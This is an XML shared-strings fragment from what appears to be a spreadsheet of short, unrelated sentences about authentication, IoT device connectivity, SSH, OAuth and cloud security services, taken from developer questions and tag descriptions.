    <t>This allows people at bigger companies to see if someone is at their desk (or at least logged into Outlook) before an attempt is made to contact them.</t>
  </si>
  <si>
    <t>I had a similar docker compose running in privileged mode but while using it to docker swarm I removed them and was working well.</t>
  </si>
  <si>
    <t>Most modern WLANs are based on IEEE 802.11 standards, marketed under the Wi-Fi brand name.</t>
  </si>
  <si>
    <t>Another method of access control is to hide Cube behind a secure, authenticated proxy.</t>
  </si>
  <si>
    <t>For example, a HTTP service application does not contain user controls; its input is usually by means of a configuration file or a separate application providing it input.</t>
  </si>
  <si>
    <t>This allows to keep control of your IoT solution and prevent a rogue compromised device to start messing around with the other devices or your data.</t>
  </si>
  <si>
    <t>Need to improve reporting, control, &amp; reliability of emails.</t>
  </si>
  <si>
    <t>They differ in what they validate and what "layer" of the e-mail system they are concerned with.</t>
  </si>
  <si>
    <t>The role descriptor is added to the access control list of the restricted resources.</t>
  </si>
  <si>
    <t>In Rails ActiveRecord, if multiple callbacks are registered on the same event, e.g.</t>
  </si>
  <si>
    <t>I want to send scans to my personal Google mail account.</t>
  </si>
  <si>
    <t>Cloud service for Docker container storage, security scanning and distribution.</t>
  </si>
  <si>
    <t>Ref: "file access permission"
After adding these capabilities, UWP app works on desktop but not working for me on Windows IoT Core device.</t>
  </si>
  <si>
    <t>An environment paradigm that doesn't involve multiple user identities.</t>
  </si>
  <si>
    <t>AWS - IAM stands for the Identity and Access Management.</t>
  </si>
  <si>
    <t>Support SAML-P for both Identity Provider (IdP) and Relying Party (RP) in ASP.NET MVC and ASP.NET MVC Core.</t>
  </si>
  <si>
    <t>It aims to be very light-weight and very secure.</t>
  </si>
  <si>
    <t>SMTP proxies are specialized Mail Transfer Agents (MTAs) that, similar to other types of proxy servers, pass SMTP sessions through to other MTAs without using the store-and-forward approach of a typical MTA.</t>
  </si>
  <si>
    <t>If you are trying to form your own mesh network with different priorities (overall link cost to a base station, instead of best link quality of available routers), you might want to consider the XBee Series 1 modules, which don't have built-in mesh networking.</t>
  </si>
  <si>
    <t>A screenshot of the app on my phone:
You can set whether you want a secure connection and the app also allows you to view the received/transmitted data in hex form.</t>
  </si>
  <si>
    <t>It supports OAuth2.0 authentication, and is able to generate strongly typed client libraries for Discovery-based services.</t>
  </si>
  <si>
    <t>This provides an easier way to establish the communication channel for data exchange than other wireless technologies like Bluetooth, that require manual device discovery or pairing.</t>
  </si>
  <si>
    <t>The MIFARE Classic card is fundamentally just a memory storage device, where the memory is divided into segments and blocks with simple security mechanisms for access control.</t>
  </si>
  <si>
    <t>I also want the server to be separate from making critical decisions (different layer for security reasons and since it won't be used as frequently as the local [offline] system).</t>
  </si>
  <si>
    <t>I'm used to dealing with this in the context of a user providing access to the keys with a keyring or something like that, but I'm not sure how you could store keys on an embedded device that requires there be no user input without using some ridiculous secure bootloader scheme or something like that.</t>
  </si>
  <si>
    <t>Can the Azure IoT hub identify the spoofing of identity during the registration process 
Assume a new IoT device is joining the IoT hub which is showing the spoofed MAC id to the IoT hub.</t>
  </si>
  <si>
    <t>I knew it, but was desesperated :(
I also put .example.com on coovachilli's allowed domains:
HS_UAMDOMAINS="connect.facebook.net,.facebook.com,.example.com"
[UPDATE]
I trespassed this issue by using firebase auth api instead of facebook api.</t>
  </si>
  <si>
    <t>When attempting to initialize the client I get the following error: 
This makes sense because my Elastic Beanstalk environment gets access to AWS services through its IAM role, rather than through a credentials file.</t>
  </si>
  <si>
    <t>I would like it to always load a fresh copy of the site from internet, but still have passwords stored, so it can access a secured content.</t>
  </si>
  <si>
    <t>NET SHARE
On Raspberry Pi
Create a mount point where you would like the Windows files to appear:
sudo mkdir /WINDOWS
Now mount the shared directory so it appears on the Pi:
sudo mount -t cifs -o username=username,password=password //WINDOWS_IP_ADDRESS/share-name /WINDOWS
You can also use the Windows machine name rather than its IP address.</t>
  </si>
  <si>
    <t>If you have a Public IP then we can come with a more direct solution, but most of the end users would NOT be having that so you'll need a common connection point on the Internet to share data.</t>
  </si>
  <si>
    <t>SocketXP will provide you a secure tunnel endpoint (a public IP/domain name and a port number) accessible from internet so that you could SSH to your Raspberry Pi from anywhere.</t>
  </si>
  <si>
    <t>In order to potentially enable your scenario, I would focus on removing the WiFi requirement from the app if possible.</t>
  </si>
  <si>
    <t>Firebase Authentication provides an API and SDK's, UI libraries and back-end services to authenticate users in a Firebase app.</t>
  </si>
  <si>
    <t>The Microsoft Authentication Libraries (MSAL) gives you the ability to add support for 
Azure Active Directory v2 (serves Microsoft Account and AAD) and B2C.</t>
  </si>
  <si>
    <t>For anything related to the F-Droid free software app store ecosystem: app builds, whitelabeling, setting up app repositories, licensing issues, etc.</t>
  </si>
  <si>
    <t>Cisco PIX (Private Internet Exchange) is a popular and widely deployed family of hardware firewall products from Cisco Systems.</t>
  </si>
  <si>
    <t>The CDM is responsible for acquiring the content keys for decryption and securely delivering the output to the devices firmware/hardware.</t>
  </si>
  <si>
    <t>It's your responsibility as a web developer to make your web application secure -- blaming your users for not being security experts is not a professional response to risk.</t>
  </si>
  <si>
    <t>An entity type must play at least one role, and one or more of the roles it plays collectively form its unique identification.</t>
  </si>
  <si>
    <t>2-Step Verification is a method of confirming a user's claimed identity by utilizing a combination of two different components.</t>
  </si>
  <si>
    <t>A service worker is JavaScript code that, once registered with an associated origin and scope, will respond to browser-initiated events, even when the pages it controls are no longer open.</t>
  </si>
  <si>
    <t>Create a class which will have all the User data once they have authenticated
Add your provider keys to the  file
Simple steps
Find the View you wish to modify.</t>
  </si>
  <si>
    <t>There is no way you can influence what the recipient does to block or accept your email, and hence, there is no programmatic solution to this problem.</t>
  </si>
  <si>
    <t>In various access control systems, roles define a group of users and organize permissions into a more manageable structure.</t>
  </si>
  <si>
    <t>Its goal is to expose scripting features
usable by technical operatives or consultants working with enterprise
platforms.</t>
  </si>
  <si>
    <t>So how do I get the trick to connect multiple X.509 devices over a single AMQPS connection?</t>
  </si>
  <si>
    <t>If a truecrypt container is synced by rsync only the affected blocks of the container will be updated.</t>
  </si>
  <si>
    <t>A simple Oracle hashing function.</t>
  </si>
  <si>
    <t>Configuration
Laravel aims to make implementing authentication very simple.</t>
  </si>
  <si>
    <t>It provides options for general administration, like account management, configuration   and system setup.</t>
  </si>
  <si>
    <t>Anyone may use these addresses without approval from a regional Internet registry (RIR).</t>
  </si>
  <si>
    <t>Most everything has a single bound global key.</t>
  </si>
  <si>
    <t>The  command was designed for network discovery, and you use it when you aren't connected to an active network.</t>
  </si>
  <si>
    <t>CyberSource is a global payments platform.</t>
  </si>
  <si>
    <t>I read  carefully https://developers.nest.com/guides/api/how-to-auth#test_for_csrf_attacks  and  Calling nest api with esp8266 using arduinoEDK 
I tried to POST api.home.nest.com wth  with  URL:/oauth2/access_token  but don't know what port to: I tried  80, 9553 and 443 with no success.</t>
  </si>
  <si>
    <t>Additionally, this module provides a class POP3_SSL, which provides support for connecting to POP3 servers that use SSL as an underlying protocol layer.</t>
  </si>
  <si>
    <t>From firecracker-microvm.github.io/:
Until now, you needed to choose between containers with fast startup times and high density, or VMs with strong hardware-virtualization-based security and workload isolation.</t>
  </si>
  <si>
    <t>The SAS token must be generated using a policy which involves the permissions: "registry write", "service connect" and "device connect" (a combination of less than these three might work, but providing "registry write" is not enough for sure).</t>
  </si>
  <si>
    <t>Note that this is a big security hole, but if it is just for yourself playing around on a private network, it is nice and simple.</t>
  </si>
  <si>
    <t>You can fully control the IP address blocks, DNS settings, security policies, and route tables within this network.</t>
  </si>
  <si>
    <t>Data validation checks that data are valid, sensible, reasonable, and secure before they are processed.</t>
  </si>
  <si>
    <t>Laravel aims to make implementing authentication very simple.</t>
  </si>
  <si>
    <t>Internal storage is best when you want to be sure that neither the user nor other apps can access your files.</t>
  </si>
  <si>
    <t>It can be used for secure password storage.</t>
  </si>
  <si>
    <t>A commercial instantiation of the technology is Intel Cilk Plus.</t>
  </si>
  <si>
    <t>Is communication between iOS and non iOS devices without jailbreak possible?</t>
  </si>
  <si>
    <t>However, it's not reliable.</t>
  </si>
  <si>
    <t>Obviously, I cannot use file as it's stored insecurely.</t>
  </si>
  <si>
    <t>I am working on a gardening system with the Intel Galileo platform.</t>
  </si>
  <si>
    <t>4) If authentication is succesful transfer data.</t>
  </si>
  <si>
    <t>Is there a way I can access it securely through my Raspberry Pi's SSH server ?</t>
  </si>
  <si>
    <t>No cryptography should be used nor network when a unix socket is faster and enough.</t>
  </si>
  <si>
    <t>Is that the devices shared access key?</t>
  </si>
  <si>
    <t>maybe just using its shared access key?</t>
  </si>
  <si>
    <t>Cognito Sync offers user state sync.</t>
  </si>
  <si>
    <t>Is there another secure way of doing it?</t>
  </si>
  <si>
    <t>The share does not require a username or password to access.</t>
  </si>
  <si>
    <t>(Yes it's secure.</t>
  </si>
  <si>
    <t>However the raspberryEncrypt.jar has not been transferred to my raspberry pi.</t>
  </si>
  <si>
    <t>I'm unsure of whether to work with a GSM shield, an Ethernet shield or an Arduino wifi shield.</t>
  </si>
  <si>
    <t>All AWS certs and keys are stored in the same folder as the above python code.</t>
  </si>
  <si>
    <t>I was able to generate the certificate and keys for the device to be used to connect to AWS IoT service using CreateKeysAndCertificateResult.</t>
  </si>
  <si>
    <t>There will only ever be one user (me) so simple authentication is all that is needed.</t>
  </si>
  <si>
    <t>The ssid and password is provided from the app via bluetooth.</t>
  </si>
  <si>
    <t>Wainting on device to connect even when the device is active.</t>
  </si>
  <si>
    <t>for now, I have managed to access my pi through ssh over the internet, but I don't know how to access the GUI interface.</t>
  </si>
  <si>
    <t>(For the device registration id needs to be alphanumeric, lowercase, may contain hyphens).</t>
  </si>
  <si>
    <t>This way it would be more secure.</t>
  </si>
  <si>
    <t>is my ssh key secure?</t>
  </si>
  <si>
    <t>As the password and username what I have as password should be None now or maybe the thumbprint, since i have no SAS token key.So what should I fit in there?</t>
  </si>
  <si>
    <t>I'm sharing two codes (code 1, code 2) here.</t>
  </si>
  <si>
    <t>League has it's own messaging app for mobile, so can I authenticate users with that app?</t>
  </si>
  <si>
    <t>iPhone shares the password of the network.</t>
  </si>
  <si>
    <t>The value 0000 0000 is transferred as 1100 0010.</t>
  </si>
  <si>
    <t>2) anonymous namespace:
This is one of the solutions I used.</t>
  </si>
  <si>
    <t>cause i want only secure Channel and data exchange.</t>
  </si>
  <si>
    <t>I have an AngularJS application that is running on a SSL secured server.</t>
  </si>
  <si>
    <t>I've looked through the various Alexa APIs like CBL authentication, Alexa Gadgets, etc but don't see a way to do this.</t>
  </si>
  <si>
    <t>Means After user logs in user will get the identity id.</t>
  </si>
  <si>
    <t>I know that PDO might be more secure, but I want to try it this way first.</t>
  </si>
  <si>
    <t>Since USB is a protocol much like IP, you're not going to be able to use discreet devices.</t>
  </si>
  <si>
    <t>Username and password are user/pass of your rpi account.</t>
  </si>
  <si>
    <t>If the communication is not disrupted, your code should work.</t>
  </si>
  <si>
    <t>It is freeware and you can download it online.</t>
  </si>
  <si>
    <t>Running the app without a password is lightning fast.</t>
  </si>
  <si>
    <t>This is not securing your password!</t>
  </si>
  <si>
    <t>If you wanna try wireless communication you can use ESP8266 13 arduino wifi shield.</t>
  </si>
  <si>
    <t>That 403 status code mean that you need authorization.</t>
  </si>
  <si>
    <t>It's definitely not cryptographically-secure.</t>
  </si>
  <si>
    <t>You can run  on your pi to see what accounts are connected via ssh.</t>
  </si>
  <si>
    <t>If there was one, it would not be very reliable.</t>
  </si>
  <si>
    <t>It'll also be a bit more secure.</t>
  </si>
  <si>
    <t>Yes, ssh is silly solution.</t>
  </si>
  <si>
    <t>The "-X" option does the magic to tunnel the X protocol transparently from the pi to the PC.</t>
  </si>
  <si>
    <t>The username is 'use-token-auth' and the password is the one you specified during device registration.</t>
  </si>
  <si>
    <t xml:space="preserve">
Where can device registration id be specified on DPS?</t>
  </si>
  <si>
    <t>(For the
  device registration id needs to be alphanumeric, lowercase, may
  contain hyphens).</t>
  </si>
  <si>
    <t>WPF UI locks awaits easily.</t>
  </si>
  <si>
    <t>When you have a XServer (GUI display), you cannot just connect to it without an authorization.</t>
  </si>
  <si>
    <t>First and foremost, PiBakery is reliable.</t>
  </si>
  <si>
    <t>A password for the superuser is set and stored in the error log file.</t>
  </si>
  <si>
    <t>Usually speaking, FX-2 USB controller does not save the firmware.</t>
  </si>
  <si>
    <t>You can even secure it with authentication.</t>
  </si>
  <si>
    <t>One of them is that it doesn't store certificates for any CAs.</t>
  </si>
  <si>
    <t>This means something is not allowing network access from within your container.</t>
  </si>
  <si>
    <t>Deprecated, please use one of: 
sts-securitytokenservice,
sts-simple-templatesystem, 
sts-springsourcetoolsuite
instead.</t>
  </si>
  <si>
    <t>The Secure Shell (SSH) daemon.</t>
  </si>
  <si>
    <t>JSR 196: Java Authentication Service Provider Interface for Containers</t>
  </si>
  <si>
    <t>Doorkeeper is an OAuth 2 provider for Rails.</t>
  </si>
  <si>
    <t>LastPass is a password management service.</t>
  </si>
  <si>
    <t>Commercial Android app obfuscator, by same developer as the better known ProGuard.</t>
  </si>
  <si>
    <t>Box API V2 using oAuth 2.0</t>
  </si>
  <si>
    <t>Continuation of CanCan, the authorization Gem for Ruby on Rails.</t>
  </si>
  <si>
    <t>OAuth.io is an API for 100+ OAuth providers.</t>
  </si>
  <si>
    <t>Java implementation of the Simple Certificate Enrollment Protocol (SCEP).</t>
  </si>
  <si>
    <t>Also known as the `Identity Server`</t>
  </si>
  <si>
    <t>Also known as a password manager.</t>
  </si>
  <si>
    <t>Amazon Chime runs securely on the AWS cloud.</t>
  </si>
  <si>
    <t>An access control list (ACL) related on Amazon Web Services (AWS)</t>
  </si>
  <si>
    <t>Vulnerability scan for Docker containers</t>
  </si>
  <si>
    <t>WMQ MFT transfers files between systems in a managed and auditable way.</t>
  </si>
  <si>
    <t>Use sts-securitytokenservice, sts-simple-templatesystem, or sts-springsourcetoolsuite as appropriate.</t>
  </si>
  <si>
    <t>SSHD is an acronym for Secure Shell Daemon, the OpenSSH SSH server.</t>
  </si>
  <si>
    <t>An application can ask for permission to access a certain account.</t>
  </si>
  <si>
    <t>The Metadata Adapter has control over authentication, authorization, and quality of service.</t>
  </si>
  <si>
    <t>Authentication realms.</t>
  </si>
  <si>
    <t>Kii Cloud secures application data by providing a user authentication.</t>
  </si>
  <si>
    <t>twemproxy also known as nutcracker, is a fast and lightweight proxy for memcached and redis protocol.</t>
  </si>
  <si>
    <t>Identifier names are preserved.</t>
  </si>
  <si>
    <t>Commercial Android app obfuscator, by same developer as the better known proguard.</t>
  </si>
  <si>
    <t>Improved bluetooth and security.</t>
  </si>
  <si>
    <t>All name access is fully qualified.</t>
  </si>
  <si>
    <t>A service account is used when you want to access your own data and not data owned by other users.</t>
  </si>
  <si>
    <t>OAuth.io is an API for 100+ oauth providers.</t>
  </si>
  <si>
    <t>For example:
Google Identity Platform</t>
  </si>
  <si>
    <t>It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.</t>
  </si>
  <si>
    <t>It uses an NXP proprietary security protocol (Crypto-1) for authentication and ciphering.</t>
  </si>
  <si>
    <t>Secure.</t>
  </si>
  <si>
    <t>How do I secure my PHP application?</t>
  </si>
  <si>
    <t>for more https://aws.amazon.com/certificate-manager/</t>
  </si>
  <si>
    <t>MetaMask can be used to store keys for Ethereum cryptocurrencies only.</t>
  </si>
  <si>
    <t>Devise is an authentication gem for Ruby-on-Rails.</t>
  </si>
  <si>
    <t>HMAC-SHA-1 and HMAC-MD5 are used within the IPsec and TLS protocols.</t>
  </si>
  <si>
    <t>Instances of java.util.Random are not cryptographically secure.</t>
  </si>
  <si>
    <t>IBM MQ MFT transfers files between systems in a managed and auditable way.</t>
  </si>
  <si>
    <t>It was inspired by The Intel Architecture Code Analyzer.</t>
  </si>
  <si>
    <t>Online Certificate Status Protocol (OCSP, RFC 2560).</t>
  </si>
  <si>
    <t>Aerospike is commonly used as a key-value store, cache replacement, user profile store, recommendation engine, and fraud detection use cases.</t>
  </si>
  <si>
    <t>The library supports OAuth2.0 authentication, and is able to generate strongly typed client libraries for Discovery-based services.</t>
  </si>
  <si>
    <t>The solution is to either make one single super-thread handling all transmissions, or to protect the port handle through a mutex.</t>
  </si>
  <si>
    <t>I found that other people across the web have had issues with client_secrets.json as well, and the solution is to find where its location is stored in the Python code, and instead of just having the name of the file, include the path as well, like this.</t>
  </si>
  <si>
    <t>This library provides functionality common to all APIs, for example HTTP transport, error handling, authentication, JSON parsing, media download/upload, and batching.</t>
  </si>
  <si>
    <t>Device Twin should be used for IoT devices regarding management since devices can't guarantee "always online" connection.</t>
  </si>
  <si>
    <t>well, theoretically it should possible to build a mesh networking behavior with BLE devices, though it has not been designed that way.</t>
  </si>
  <si>
    <t>Apache Shiro is a Java security framework that performs authentication, authorization, cryptography, and session management.</t>
  </si>
  <si>
    <t>Managed profiles
Users often want to use their personal devices in an enterprise setting.</t>
  </si>
  <si>
    <t>API design is the process of determining and exposing a set of consistent method signatures, return values, and documentation intended for use by other developers to allow programmatic access to data.</t>
  </si>
  <si>
    <t>Nessus is a commercial vulnerability scanner offered by Tenable Security.</t>
  </si>
  <si>
    <t>Azure Protocol gateway is required for conversion of protocols and ease of interoperability.</t>
  </si>
  <si>
    <t>Normally, at least some RMI-capable applications access the registry remotely over the network.</t>
  </si>
  <si>
    <t>One major caveat here is that you will get one transaction ID and the customer will get another.</t>
  </si>
  <si>
    <t>Now, you're ready to authorize a Twitter account with your application.</t>
  </si>
  <si>
    <t>Quoting from the relevant MSDN documentation page:
In a service, use the FaultException class to create an untyped fault to return to the client for debugging purposes.</t>
  </si>
  <si>
    <t>I would like to be able to secure the data transmission.</t>
  </si>
  <si>
    <t>I need to make it secure, i.e.</t>
  </si>
  <si>
    <t>I'm trying to make a secure protocol between an iPhone app and an Arduino server.</t>
  </si>
  <si>
    <t>but the alarm report using this is not very reliable.</t>
  </si>
  <si>
    <t>Programmer may not be reliable.</t>
  </si>
  <si>
    <t>Is there any other more sophisticated solution?</t>
  </si>
  <si>
    <t>I have ssh'd into my rasberry pi and built a rails application.</t>
  </si>
  <si>
    <t>Added:
my registration id looks like this (almost):
dxxxxxxxVEs:APA9xxxcL--JnhswC1w8utjxxxxxxxxxxxxxxxxxxxglosvLbvEAwh7sxxxxxxxxxQo3Fq4sn0yqZUN6Hy89IB9mAS3FusBo68UE4l3xDVRHxxxxxxxxxxpANAHWuLgXHqBoDsLsXBj</t>
  </si>
  <si>
    <t>I have been looking for the past several hours at different solutions, and they all seem to boil down to permissions.</t>
  </si>
  <si>
    <t>But i am not getting, how my mobile application and wso2is will communicate to each other for user authentication.</t>
  </si>
  <si>
    <t>Declare permissions that you need in your app's manifest file.</t>
  </si>
  <si>
    <t>I have a python script on raspberry pi 3 and I want to secure my script as much as possible.</t>
  </si>
  <si>
    <t>This brings me to the OAuth2-flow.</t>
  </si>
  <si>
    <t>It seems that the account linking was failed.</t>
  </si>
  <si>
    <t>Can someone help with these questions -- 
Where can device registration id be specified on DPS?</t>
  </si>
  <si>
    <t>I looked it up online, and all I found were httpNodeAuth.</t>
  </si>
  <si>
    <t>I have a problem on Javafx with the Communication Threat.</t>
  </si>
  <si>
    <t>The certificate used is added to MY certificate store.</t>
  </si>
  <si>
    <t>I need some communication and have employed a Huawei MU509 module.</t>
  </si>
  <si>
    <t>What is the Authentication and Authorization mechanism for Applications?</t>
  </si>
  <si>
    <t>Because I cannot find any examples where authorization is used.</t>
  </si>
  <si>
    <t>Now I want to use letsencrypt to securely access my site.</t>
  </si>
  <si>
    <t>Did anyone manage to get spyder with python 3 on a raspberry?</t>
  </si>
  <si>
    <t>I'm new to cyber security &amp; pentesting and have only used Ubuntu, no experience with Kali yet.</t>
  </si>
  <si>
    <t>That said, it's unlikely that these other devices are HID compliant.</t>
  </si>
  <si>
    <t>Since it is a passive circuit, now way to exceed 5V, it is safe.</t>
  </si>
  <si>
    <t xml:space="preserve">
CAN bus is a communication protocol(like RS485, but more reliable).</t>
  </si>
  <si>
    <t>Your network provider is maybe in this list : gprs list
For T-Mobile USA : guest guest
For T-Mobile UK : user pass</t>
  </si>
  <si>
    <t>You can disable authentication globally compiling mongoose with 
-DMONGOOSE_NO_AUTH.</t>
  </si>
  <si>
    <t>You just have to make sure you keep the AES key secure.</t>
  </si>
  <si>
    <t>If you just need a face detector, Viola-Jones object detector is fast and very accurate.</t>
  </si>
  <si>
    <t>If you're a hobbyist looking to tinker, just get some XBee modules and build a proprietary network.</t>
  </si>
  <si>
    <t>As far as  I Know, Why not use OAuth 2.0 for this purpose?</t>
  </si>
  <si>
    <t>By doing this the developer can have his device communicate with other devices on that network.</t>
  </si>
  <si>
    <t>As it's a Windows OS it has the default admin shares in place.</t>
  </si>
  <si>
    <t>In general when using USB devices there is no reliable enumeration.</t>
  </si>
  <si>
    <t>When I tried to access the service using Safari it said:
Which is way clearer.</t>
  </si>
  <si>
    <t>This way is a secure way, to generate a new device.</t>
  </si>
  <si>
    <t>It is unrelated that your service runs as root.</t>
  </si>
  <si>
    <t>Solution: provide a new valid SAS token.</t>
  </si>
  <si>
    <t>You don't need to store the root certificate anywhere though.</t>
  </si>
  <si>
    <t>That way the file sharing and security are all handled for you.</t>
  </si>
  <si>
    <t>IoT now provides a new endpoint to Amazon Trust Services (ATS), which uses a trusted certificate.</t>
  </si>
  <si>
    <t>It will however NOT deliver a certified HomeKit device.</t>
  </si>
  <si>
    <t>It does not allow you to identify single devices.</t>
  </si>
  <si>
    <t>If you're really paranoid about security, use a secure element.</t>
  </si>
  <si>
    <t>But here is a solution that should work for all openWRT and Linino based boards:
SSH in to your board.</t>
  </si>
  <si>
    <t>Also note, have your certificate active in the AWS IoT console to avoid SSLError.</t>
  </si>
  <si>
    <t>It's not secure but maybe that's ok for your use case.</t>
  </si>
  <si>
    <t>It can also be thought of as a semigroup with an identity element.</t>
  </si>
  <si>
    <t>Compact, universal identifier for a managed object.</t>
  </si>
  <si>
    <t>From a security point of view - any data or resource that should be (or can be) protected.</t>
  </si>
  <si>
    <t>Windows command for managing Certificate Services.</t>
  </si>
  <si>
    <t>A user role is a group of users that share the same privileges or permissions on a system.</t>
  </si>
  <si>
    <t>NetIQ Corp. is a security management software company.</t>
  </si>
  <si>
    <t>OAuth 2.0 is the next evolution of the OAuth protocol and is not backwards compatible with OAuth 1.0.</t>
  </si>
  <si>
    <t>It is compliant with an OAuth 2.0 specification</t>
  </si>
  <si>
    <t>The protocol is designed for access to a server API from applications running on mobile devices.</t>
  </si>
  <si>
    <t>Account kit is provided by Facebook to enable password less logins through any app by using their SDK.</t>
  </si>
  <si>
    <t>Ether is the currency used in Ethereum blockchain technology.</t>
  </si>
  <si>
    <t>For help with IBM Cloud's Key-Protect service</t>
  </si>
  <si>
    <t>Token-based authentication for Rails JSON APIs.</t>
  </si>
  <si>
    <t>An authentication system is responsible to tell if the user is who they claim to be.</t>
  </si>
  <si>
    <t>For questions about denial-of-service (DoS) attacks, use [denial-of-service].</t>
  </si>
  <si>
    <t>A simple library to encode and decode JSON Web Tokens (JWT) in PHP, conforming to RFC 7519.</t>
  </si>
  <si>
    <t>BitMex is a P2P crypto-products trading platform.</t>
  </si>
  <si>
    <t>In Java, a keystore is a repository of security certificates, either authorization certificates or public key certificates</t>
  </si>
  <si>
    <t>Services based on the protocol have also been adopted by MasterCard, under the name MasterCard SecureCode, and by JCB International as J/Secure.</t>
  </si>
  <si>
    <t>See RFC 854 for details about the Telnet protocol.</t>
  </si>
  <si>
    <t>Application keys
Please login with your Spotify Premium account to apply for an application key.</t>
  </si>
  <si>
    <t>Assurance (also Information Assurance IA) is normally considered part of the data security realm.</t>
  </si>
  <si>
    <t>This has several impacts on security and authorization.</t>
  </si>
  <si>
    <t>ZfcUser is a zend framework module for handling User authentication + registration.</t>
  </si>
  <si>
    <t>Wikipedia article for nore information about exponents and their identities.</t>
  </si>
  <si>
    <t>The Google OAuth Client Library for Java provides Java classes and methods for both OAuth 1.0a and OAuth 2.0.</t>
  </si>
  <si>
    <t>The Intel Hardware Accelerated Execution Manager (Intel HAXM).</t>
  </si>
  <si>
    <t>There is also a LastPass Password Manager bookmarklet for other browsers.</t>
  </si>
  <si>
    <t>A semigroup generalizes a monoid in that a semigroup need not have an identity element.</t>
  </si>
  <si>
    <t>Box offers a new API V2, following the oAuth 2.0 protocol.</t>
  </si>
  <si>
    <t>This flow is recommended as it is secure.</t>
  </si>
  <si>
    <t>It helps you connect to and manage your favorite proxy or VPN service.</t>
  </si>
  <si>
    <t>It was inspired by Chubby, Google's distributed lock system.</t>
  </si>
  <si>
    <t>OAuth 2.0 is not backwards compatible with OAuth 1.0.</t>
  </si>
  <si>
    <t>reduce fraud.</t>
  </si>
  <si>
    <t>When it comes to security you can't secure your application to be  100% safe.</t>
  </si>
  <si>
    <t>All Bot Framework services use industry-standard REST and JSON over HTTPS.</t>
  </si>
  <si>
    <t>Informatica Administrator - a web application that you use to administer the Informatica domain and PowerCenter security.</t>
  </si>
  <si>
    <t>Identity UI library &amp; scaffolding  Add identity to any app and customize it to meet your needs.</t>
  </si>
  <si>
    <t>Resources
RFC 5849 - The OAuth 1.0 Protocol.</t>
  </si>
  <si>
    <t>Key differences OAuth 1.0/2.0.</t>
  </si>
  <si>
    <t>The most known authentication system is to use a password, this is a single factor.</t>
  </si>
  <si>
    <t>The Wink API connects Wink devices to users, apps, each other, and the wider web.</t>
  </si>
  <si>
    <t>Zend_Auth is concerned only with authentication and not with authorization.</t>
  </si>
  <si>
    <t>Different types of backend authentications that can be used with Zend_Auth.</t>
  </si>
  <si>
    <t>Vokuro - Sample lightweight application demonstrating authentication and authorization using Phalcon.</t>
  </si>
  <si>
    <t>It is based on the Secure Shell (SSH) protocol.</t>
  </si>
  <si>
    <t>method to test the current user's authorization.</t>
  </si>
  <si>
    <t>Edge: Userscript managers: Tampermonkey.</t>
  </si>
  <si>
    <t>UC Browser: Userscript managers: Tampermonkey.</t>
  </si>
  <si>
    <t>As such, it is not recommended to be used for any secure system.</t>
  </si>
  <si>
    <t>I am using WiFly Shield for WiFi communication.</t>
  </si>
  <si>
    <t>I'm using Cognito unauth roles as a subscriber.</t>
  </si>
  <si>
    <t>Use one of:  sts-securitytokenservice, sts-simple-templatesystem, or sts-springsourcetoolsuite.</t>
  </si>
  <si>
    <t>Spring Security is the Spring Framework's application security solution.</t>
  </si>
  <si>
    <t>I'm writing a project on arduino and I'm storing a password in a const char array.</t>
  </si>
  <si>
    <t>These also control what access they have.</t>
  </si>
  <si>
    <t>If each gpio-key is tied to a different keycode, you'll be able to distinguish them from each other.</t>
  </si>
  <si>
    <t>If you are trying to talk about access control lists, try "acl"</t>
  </si>
  <si>
    <t>Web3 is the JavaScript framework for interacting with Ethereum blockchain.</t>
  </si>
  <si>
    <t>More sophisticated devices can mark packets through tagging, so that a single interconnect (trunk) may be used to transport data for various VLANs.</t>
  </si>
  <si>
    <t>[update]: I managed to change the driver to Google's driver, but still not detected.</t>
  </si>
  <si>
    <t>A more secure approach would be to put the ESP8266 in access point mode.</t>
  </si>
  <si>
    <t>Undocumented Matlab - Many hidden gems regarding matlab figure handling.</t>
  </si>
  <si>
    <t>The user credentials can be stored on the HTTP server itself, or on a remote system such as LDAP.</t>
  </si>
  <si>
    <t>Stable and reliable on Apple, nothing on Android.</t>
  </si>
  <si>
    <t>It 'should' have a message in it regarding the registration failure.</t>
  </si>
  <si>
    <t>It is run as a module inside the Linux kernel and aims for better performance than the IPsec and OpenVPN tunneling protocols.</t>
  </si>
  <si>
    <t>Existing Log In with PayPal (formerly PayPal Access) apps are now brought over from devportal.x.com.</t>
  </si>
  <si>
    <t>I currently have my computer and Raspberry Pi sharing the same router but can not SSH into my pi.</t>
  </si>
  <si>
    <t>It uses a key-value storage and hashing for fast retrieval of the data by key.</t>
  </si>
  <si>
    <t>Nessus is a commercial vulnerability scanner offered by Tenable Security</t>
  </si>
  <si>
    <t>Amazon Web Services provides ongoing security and maintenance updates to all instances running the Amazon Linux AMI.</t>
  </si>
  <si>
    <t>FreeIPA is an integrated security information management solution combining Linux (Fedora), 389 Directory Server, MIT Kerberos, NTP, DNS, Dogtag (Certificate System).</t>
  </si>
  <si>
    <t>For transparent data storage used for faster access, see cache.</t>
  </si>
  <si>
    <t>Hot Code Pushes - Update your app while users are connected without disturbing them.</t>
  </si>
  <si>
    <t>Just go to Settings, select Update &amp; security, then For developers.</t>
  </si>
  <si>
    <t>For a project I would like to check the identity of a raspberry Pi device.</t>
  </si>
  <si>
    <t>I used xxxxxx, to hide my project's identity (Please bear with me for that!)</t>
  </si>
  <si>
    <t>The registration for a DependencyProperty is case sensitive.</t>
  </si>
  <si>
    <t>By any chance have you secured your Hub with X509 certificate
https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-security-x509-get-started#</t>
  </si>
  <si>
    <t>Prior to Mac OS X v10.5, NSMenuItem conformed to the following protocols: NSCopying, NSCoding), and NSValidatedUserInterfaceItem.</t>
  </si>
  <si>
    <t>I tried several solutions to trust all certificates but i got some syntax errors.</t>
  </si>
  <si>
    <t># If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.</t>
  </si>
  <si>
    <t>I am using an app to lock, unlock, and open the trunk of my car.</t>
  </si>
  <si>
    <t>So I need to enable Secure Admin.</t>
  </si>
  <si>
    <t>This works very good when I am connected to my raspberrypi with the ssh -X option, where I share the xserver.</t>
  </si>
  <si>
    <t>Expected OAuth 2 access token, login cookie or other valid authentication credential.</t>
  </si>
  <si>
    <t>Expected OAuth 2 access token, login cookie or other valid authentication credential"
I don't know where to look.</t>
  </si>
  <si>
    <t>To continuosly monitor the logged in users, I am trying to use akka actors.</t>
  </si>
  <si>
    <t>How can I create unprivileged containers?</t>
  </si>
